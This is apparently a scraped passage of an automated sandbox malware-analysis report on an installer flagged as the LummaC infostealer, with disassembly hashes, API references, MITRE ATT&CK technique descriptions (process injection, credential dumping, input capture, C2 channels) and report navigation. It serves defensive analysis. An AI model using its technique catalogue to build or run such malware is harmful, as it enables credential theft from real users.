, xrefs: 00433D17

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeString
String ID: $ $ $$$$$&$&$'$($($*$+$,$,$.$/$/$0$0$1$1$2$4$6$8$:$<$>
API String ID: 3341692771-539718436
Opcode ID: 27aef89e738d6db16f455bf0dcb93a7228f1fcb7f48197c52414bafd17e4ad59
Instruction ID: fdcf081647d469254c784f569f1122ccc38dc39f383c223ff7c4c6cbeeb5c254
Opcode Fuzzy Hash: 27aef89e738d6db16f455bf0dcb93a7228f1fcb7f48197c52414bafd17e4ad59
Instruction Fuzzy Hash: A4813760108BC28ADB26CF3C88D824A7E901B67224F5887DCD8E54F3DBD3A5C146C766

Function 0042A1C7 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 244COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,176A1531), ref: 0042A4FE
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,176A1531,176A1531), ref: 0042A584

Strings

\1A3, xrefs: 0042A43E
8]8_, xrefs: 0042A46F
PQ, xrefs: 0042A479

Memory Dump Source

Source File: 00000003.00000002.2453395093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 8]8_$PQ$\1A3
API String ID: 237503144-1404022207
Opcode ID: 974964523f9558dfe6089869c65dad3383543572617cc6c11a482246010927aa
Instruction ID: 80ac2d1e7d7b5c2abb319b705a0a484343704cffa4bc9453e423137f34cd96bf
Opcode Fuzzy Hash: 974964523f9558dfe6089869c65dad3383543572617cc6c11a482246010927aa
Instruction Fuzzy Hash: E08122B5E00228DBEB10CF65EC817AEB7B0FF49304F54416ED818AB241DB399956CF89

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Installer_x64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
Installer_x64.exe